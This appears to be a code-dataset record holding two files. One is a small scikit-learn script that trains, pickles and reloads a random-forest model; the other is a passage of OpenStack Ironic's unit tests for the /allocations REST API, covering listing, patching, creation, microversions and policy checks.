37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
] | null | null | null |
import pickle
# Author: Tim Head <betatim@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputRegressor
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(600, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y += (0.5 - rng.rand(*y.shape))
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=400, test_size=200, random_state=4)
max_depth = 30
model = MultiOutputRegressor(RandomForestRegressor(n_estimators=100,
max_depth=max_depth,
random_state=0))
model.fit(X_train, y_train)
# save the model to disk
filename = 'trained_model.mdl'
pickle.dump(model, open(filename, 'wb'))
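# Round-trip sketch: reload the pickled model and predict both targets
# (appended check; printed values are approximate).
loaded_model = pickle.load(open(filename, 'rb'))
print(loaded_model.predict([[10.0]]))  # ~[[pi*sin(10), pi*cos(10)]]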
| 29.484848
| 78
| 0.663926
|
7409ea2ae9b4b9441d60c0831676403966f6a9b1
| 62,803
|
py
|
Python
|
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /allocations/ methods.
"""
import datetime
from http import client as http_client
from unittest import mock
from urllib import parse as urlparse
import fixtures
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import uuidutils
from ironic.api.controllers import base as api_base
from ironic.api.controllers import v1 as api_v1
from ironic.api.controllers.v1 import allocation as api_allocation
from ironic.api.controllers.v1 import notification_utils
from ironic.api import types as atypes
from ironic.common import exception
from ironic.common import policy
from ironic.conductor import rpcapi
from ironic import objects
from ironic.objects import fields as obj_fields
from ironic.tests import base
from ironic.tests.unit.api import base as test_api_base
from ironic.tests.unit.api import utils as apiutils
from ironic.tests.unit.objects import utils as obj_utils
class TestAllocationObject(base.TestCase):
def test_allocation_init(self):
allocation_dict = apiutils.allocation_post_data(node_id=None)
del allocation_dict['extra']
allocation = api_allocation.Allocation(**allocation_dict)
self.assertEqual(atypes.Unset, allocation.extra)
class TestListAllocations(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestListAllocations, self).setUp()
self.node = obj_utils.create_test_node(self.context, name='node-1')
def test_empty(self):
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual([], data['allocations'])
def test_one(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(allocation.uuid, data['allocations'][0]["uuid"])
self.assertEqual(allocation.name, data['allocations'][0]['name'])
self.assertEqual({}, data['allocations'][0]["extra"])
self.assertEqual(self.node.uuid, data['allocations'][0]["node_uuid"])
self.assertEqual(allocation.owner, data['allocations'][0]["owner"])
# never expose the node_id
self.assertNotIn('node_id', data['allocations'][0])
def test_get_one(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
self.assertEqual({}, data["extra"])
self.assertEqual(self.node.uuid, data["node_uuid"])
self.assertEqual(allocation.owner, data["owner"])
# never expose the node_id
self.assertNotIn('node_id', data)
def test_get_one_with_json(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations/%s.json' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_with_json_in_name(self):
allocation = obj_utils.create_test_allocation(self.context,
name='pg.json',
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_with_suffix(self):
allocation = obj_utils.create_test_allocation(self.context,
name='pg.1',
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_custom_fields(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
fields = 'resource_class,extra'
data = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers)
# We always append "links"
self.assertCountEqual(['resource_class', 'extra', 'links'], data)
def test_get_collection_custom_fields(self):
fields = 'uuid,extra'
for i in range(3):
obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json(
'/allocations?fields=%s' % fields,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
for allocation in data['allocations']:
# We always append "links"
self.assertCountEqual(['uuid', 'extra', 'links'], allocation)
def test_get_custom_fields_invalid_fields(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
fields = 'uuid,spongebob'
response = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers, expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('spongebob', response.json['error_message'])
def test_get_one_invalid_api_version(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
response = self.get_json(
'/allocations/%s' % (allocation.uuid),
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_get_one_invalid_api_version_without_check(self):
# Invalid name, but the check happens after the microversion check.
response = self.get_json(
'/allocations/ba!na!na!',
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_many(self):
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context, node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(len(allocations), len(data['allocations']))
uuids = [n['uuid'] for n in data['allocations']]
self.assertCountEqual(allocations, uuids)
def test_links(self):
uuid = uuidutils.generate_uuid()
obj_utils.create_test_allocation(self.context,
uuid=uuid,
node_id=self.node.id)
data = self.get_json('/allocations/%s' % uuid, headers=self.headers)
self.assertIn('links', data)
self.assertEqual(2, len(data['links']))
self.assertIn(uuid, data['links'][0]['href'])
for link in data['links']:
bookmark = link['rel'] == 'bookmark'
self.assertTrue(self.validate_link(link['href'], bookmark=bookmark,
headers=self.headers))
def test_collection_links(self):
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations/?limit=3', headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_collection_links_default_limit(self):
cfg.CONF.set_override('max_limit', 3, 'api')
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_collection_links_custom_fields(self):
cfg.CONF.set_override('max_limit', 3, 'api')
fields = 'uuid,extra'
allocations = []
for i in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
allocations.append(allocation.uuid)
data = self.get_json(
'/allocations?fields=%s' % fields,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
self.assertIn('fields', data['next'])
def test_get_collection_pagination_no_uuid(self):
fields = 'node_uuid'
limit = 2
allocations = []
for id_ in range(3):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation)
data = self.get_json(
'/allocations?fields=%s&limit=%s' % (fields, limit),
headers=self.headers)
self.assertEqual(limit, len(data['allocations']))
self.assertIn('marker=%s' % allocations[limit - 1].uuid, data['next'])
def test_allocation_get_all_invalid_api_version(self):
obj_utils.create_test_allocation(
self.context, node_id=self.node.id, uuid=uuidutils.generate_uuid(),
name='allocation_1')
response = self.get_json('/allocations',
headers={api_base.Version.string: '1.14'},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbidden(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
raise exception.HTTPForbidden(resource='fake')
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations', expect_errors=True,
headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbidden_no_project(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations', expect_errors=True,
headers={
api_base.Version.string: '1.59',
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbid_owner_proj_mismatch(
self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations?owner=54321',
expect_errors=True,
headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_non_admin(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
allocations = []
        for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
owner='12345')
allocations.append(allocation.uuid)
        for id_ in range(2):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid())
data = self.get_json('/allocations', headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'})
self.assertEqual(len(allocations), len(data['allocations']))
uuids = [n['uuid'] for n in data['allocations']]
self.assertEqual(sorted(allocations), sorted(uuids))
def test_sort_key(self):
allocations = []
for id_ in range(3):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations?sort_key=uuid',
headers=self.headers)
uuids = [n['uuid'] for n in data['allocations']]
self.assertEqual(sorted(allocations), uuids)
def test_sort_key_invalid(self):
invalid_keys_list = ['foo', 'extra', 'internal_info', 'properties']
for invalid_key in invalid_keys_list:
response = self.get_json('/allocations?sort_key=%s' % invalid_key,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(invalid_key, response.json['error_message'])
def test_sort_key_allowed(self):
allocation_uuids = []
for id_ in range(3, 0, -1):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocation_uuids.append(allocation.uuid)
allocation_uuids.reverse()
data = self.get_json('/allocations?sort_key=name',
headers=self.headers)
data_uuids = [p['uuid'] for p in data['allocations']]
self.assertEqual(allocation_uuids, data_uuids)
def test_get_all_by_state(self):
for i in range(5):
if i < 3:
state = 'allocating'
else:
state = 'active'
obj_utils.create_test_allocation(
self.context,
state=state,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?state=allocating",
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_owner(self):
for i in range(5):
if i < 3:
owner = '12345'
else:
owner = '54321'
obj_utils.create_test_allocation(
self.context,
owner=owner,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?owner=12345",
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_owner_not_allowed(self):
response = self.get_json("/allocations?owner=12345",
headers={api_base.Version.string: '1.59'},
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_code)
self.assertTrue(response.json['error_message'])
def test_get_all_by_node_name(self):
for i in range(5):
if i < 3:
node_id = self.node.id
else:
node_id = 100000 + i
obj_utils.create_test_allocation(
self.context,
node_id=node_id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?node=%s" % self.node.name,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_node_uuid(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
data = self.get_json('/allocations?node=%s' % (self.node.uuid),
headers=self.headers)
self.assertEqual(1, len(data['allocations']))
def test_get_all_by_non_existing_node(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.get_json('/allocations?node=banana',
headers=self.headers, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
def test_get_by_node_resource(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/nodes/%s/allocation' % self.node.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
self.assertEqual({}, data["extra"])
self.assertEqual(self.node.uuid, data["node_uuid"])
def test_get_by_node_resource_invalid_api_version(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.get_json(
'/nodes/%s/allocation' % self.node.uuid,
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_get_by_node_resource_with_fields(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
data = self.get_json('/nodes/%s/allocation?fields=name,extra' %
self.node.uuid,
headers=self.headers)
self.assertNotIn('uuid', data)
self.assertIn('name', data)
self.assertEqual({}, data["extra"])
def test_get_by_node_resource_and_id(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
response = self.get_json('/nodes/%s/allocation/%s' % (self.node.uuid,
allocation.uuid),
headers=self.headers, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_by_node_resource_not_existed(self):
node = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
res = self.get_json('/node/%s/allocation' % node.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_by_node_invalid_node(self):
res = self.get_json('/node/%s/allocation' % uuidutils.generate_uuid(),
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_allocation_owner_hidden_in_lower_version(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json(
'/allocations/%s' % allocation.uuid,
headers={api_base.Version.string: '1.59'})
self.assertNotIn('owner', data)
data = self.get_json(
'/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertIn('owner', data)
def test_allocation_owner_null_field(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner=None)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertIsNone(data['owner'])
def test_allocation_owner_present(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner='12345')
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(data['owner'], '12345')
def test_get_owner_field(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner='12345')
fields = 'owner'
response = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers)
self.assertIn('owner', response)
class TestPatch(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestPatch, self).setUp()
self.allocation = obj_utils.create_test_allocation(self.context)
def test_update_not_allowed(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo',
'value': 'bar',
'op': 'add'}],
expect_errors=True,
headers={api_base.Version.string: '1.56'})
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_update_not_found(self):
uuid = uuidutils.generate_uuid()
response = self.patch_json('/allocations/%s' % uuid,
[{'path': '/name', 'value': 'b',
'op': 'replace'}],
expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_add(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo', 'value': 'bar',
'op': 'add'}], headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_int)
def test_add_non_existent(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/foo', 'value': 'bar',
'op': 'add'}],
expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_add_multi(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo1', 'value': 'bar1',
'op': 'add'},
{'path': '/extra/foo2', 'value': 'bar2',
'op': 'add'}], headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
expected = {"foo1": "bar1", "foo2": "bar2"}
self.assertEqual(expected, result['extra'])
def test_replace_invalid_name(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name', 'value': '[test]',
'op': 'replace'}],
expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(timeutils, 'utcnow')
def test_replace_singular(self, mock_utcnow, mock_notify):
test_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = test_time
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name',
'value': 'test', 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertEqual('test', result['name'])
return_updated_at = timeutils.parse_isotime(
result['updated_at']).replace(tzinfo=None)
self.assertEqual(test_time, return_updated_at)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END)])
def test_replace_name_with_none(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name',
'value': None, 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertIsNone(result['name'])
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(objects.Allocation, 'save')
def test_update_error(self, mock_save, mock_notify):
mock_save.side_effect = Exception()
allocation = obj_utils.create_test_allocation(self.context)
self.patch_json('/allocations/%s' % allocation.uuid, [{'path': '/name',
'value': 'new', 'op': 'replace'}],
expect_errors=True, headers=self.headers)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR)])
def test_replace_multi(self):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
allocation = obj_utils.create_test_allocation(
self.context, extra=extra, uuid=uuidutils.generate_uuid())
new_value = 'new value'
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/foo2',
'value': new_value, 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
extra["foo2"] = new_value
self.assertEqual(extra, result['extra'])
def test_remove_uuid(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/uuid', 'op': 'remove'}],
expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_remove_singular(self):
allocation = obj_utils.create_test_allocation(
self.context, extra={'a': 'b'}, uuid=uuidutils.generate_uuid())
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/a', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
        self.assertEqual({}, result['extra'])
# Assert nothing else was changed
self.assertEqual(allocation.uuid, result['uuid'])
def test_remove_multi(self):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
allocation = obj_utils.create_test_allocation(
self.context, extra=extra, uuid=uuidutils.generate_uuid())
# Removing one item from the collection
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/foo2', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
extra.pop("foo2")
self.assertEqual(extra, result['extra'])
# Removing the collection
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual({}, result['extra'])
# Assert nothing else was changed
self.assertEqual(allocation.uuid, result['uuid'])
def test_remove_non_existent_property_fail(self):
response = self.patch_json(
'/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/non-existent', 'op': 'remove'}],
expect_errors=True, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertTrue(response.json['error_message'])
def test_update_owner_not_acceptable(self):
allocation = obj_utils.create_test_allocation(
self.context, owner='12345', uuid=uuidutils.generate_uuid())
new_owner = '54321'
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/owner',
'value': new_owner,
'op': 'replace'}],
expect_errors=True, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
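# Test helper standing in for ConductorAPI.create_allocation: it creates the
# allocation locally and asserts that the API layer picked the expected RPC
# topic for the request.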
def _create_locally(_api, _ctx, allocation, topic):
if 'node_id' in allocation and allocation.node_id:
assert topic == 'node-topic', topic
else:
assert topic == 'some-topic', topic
allocation.create()
return allocation
@mock.patch.object(rpcapi.ConductorAPI, 'create_allocation', _create_locally)
class TestPost(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestPost, self).setUp()
self.mock_get_topic = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_random_topic')
).mock
self.mock_get_topic.return_value = 'some-topic'
self.mock_get_topic_for_node = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_topic_for')
).mock
self.mock_get_topic_for_node.return_value = 'node-topic'
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_create_allocation(self, mock_utcnow, mock_notify):
adict = apiutils.allocation_post_data()
test_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = test_time
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(adict['uuid'], response.json['uuid'])
self.assertEqual('allocating', response.json['state'])
self.assertIsNone(response.json['node_uuid'])
self.assertEqual([], response.json['candidate_nodes'])
self.assertEqual([], response.json['traits'])
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertFalse(result['updated_at'])
self.assertIsNone(result['node_uuid'])
self.assertEqual([], result['candidate_nodes'])
self.assertEqual([], result['traits'])
self.assertIsNone(result['owner'])
self.assertNotIn('node', result)
return_created_at = timeutils.parse_isotime(
result['created_at']).replace(tzinfo=None)
self.assertEqual(test_time, return_created_at)
# Check location header
self.assertIsNotNone(response.location)
expected_location = '/v1/allocations/%s' % adict['uuid']
self.assertEqual(urlparse.urlparse(response.location).path,
expected_location)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END),
])
def test_create_allocation_invalid_api_version(self):
adict = apiutils.allocation_post_data()
response = self.post_json(
'/allocations', adict, headers={api_base.Version.string: '1.50'},
expect_errors=True)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_create_allocation_doesnt_contain_id(self):
with mock.patch.object(self.dbapi, 'create_allocation',
wraps=self.dbapi.create_allocation) as cp_mock:
adict = apiutils.allocation_post_data(extra={'foo': 123})
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['extra'], result['extra'])
cp_mock.assert_called_once_with(mock.ANY)
# Check that 'id' is not in first arg of positional args
self.assertNotIn('id', cp_mock.call_args[0][0])
@mock.patch.object(notification_utils.LOG, 'exception', autospec=True)
@mock.patch.object(notification_utils.LOG, 'warning', autospec=True)
def test_create_allocation_generate_uuid(self, mock_warn, mock_except):
adict = apiutils.allocation_post_data()
del adict['uuid']
response = self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
self.assertFalse(mock_warn.called)
self.assertFalse(mock_except.called)
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(objects.Allocation, 'create')
def test_create_allocation_error(self, mock_create, mock_notify):
mock_create.side_effect = Exception()
adict = apiutils.allocation_post_data()
self.post_json('/allocations', adict, headers=self.headers,
expect_errors=True)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR),
])
def test_create_allocation_with_candidate_nodes(self):
node1 = obj_utils.create_test_node(self.context,
name='node-1')
node2 = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
adict = apiutils.allocation_post_data(
candidate_nodes=[node1.name, node2.uuid])
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual([node1.uuid, node2.uuid], result['candidate_nodes'])
def test_create_allocation_valid_extra(self):
adict = apiutils.allocation_post_data(
extra={'str': 'foo', 'int': 123, 'float': 0.1, 'bool': True,
'list': [1, 2], 'none': None, 'dict': {'cat': 'meow'}})
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['extra'], result['extra'])
def test_create_allocation_with_no_extra(self):
adict = apiutils.allocation_post_data()
del adict['extra']
response = self.post_json('/allocations', adict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
def test_create_allocation_no_mandatory_field_resource_class(self):
adict = apiutils.allocation_post_data()
del adict['resource_class']
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('resource_class', response.json['error_message'])
def test_create_allocation_resource_class_too_long(self):
adict = apiutils.allocation_post_data()
adict['resource_class'] = 'f' * 81
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
